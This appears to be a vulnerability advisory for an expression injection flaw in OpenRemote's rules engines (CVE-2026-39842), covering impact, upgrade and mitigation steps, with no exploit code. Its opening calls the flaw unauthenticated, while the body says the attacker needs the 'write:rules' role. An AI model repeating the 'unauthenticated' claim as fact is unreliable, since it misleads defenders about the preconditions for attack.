CVE-2026-39842

OpenRemote · IoT platform

OpenRemote contains expression injection vulnerabilities in its rules engine, enabling unauthenticated remote code execution with root-level privileges.

Executive summary

A critical expression injection vulnerability in the OpenRemote IoT platform allows attackers to execute arbitrary code with root privileges, leading to full system and multi-tenant compromise.

Vulnerability

This vulnerability involves an expression injection flaw in the JavaScript and Groovy rules engines. An attacker with the "write:rules" role can bypass authorization and sandbox restrictions to execute arbitrary code with full JVM and root access.

Business impact

The exploitation of this vulnerability results in complete system compromise, including unauthorized access to sensitive database credentials, arbitrary file reading, and the bypass of multi-tenant security boundaries. Given the CVSS score of 9.9, this represents a severe risk of data exfiltration and total loss of platform integrity, which could lead to significant operational downtime and reputational damage.

Remediation

Immediate Action: Upgrade the OpenRemote IoT platform to version 1.22.0 or later immediately to patch the rules engine vulnerabilities.

Proactive Monitoring: Review server logs for suspicious rule creation activity and monitor for unauthorized access attempts to sensitive configuration files or environment variables.

Compensating Controls: Restrict access to the "write:rules" functionality to only the most trusted administrative accounts and utilize network segmentation to isolate the IoT platform from critical infrastructure.

Exploitation status

Public Exploit Available: Unknown

Analyst recommendation

The severity of this vulnerability, combined with the potential for complete root-level compromise of the IoT environment, necessitates an immediate update to version 1.22.0. Organizations should prioritize this deployment to prevent unauthorized access and protect sensitive multi-tenant data.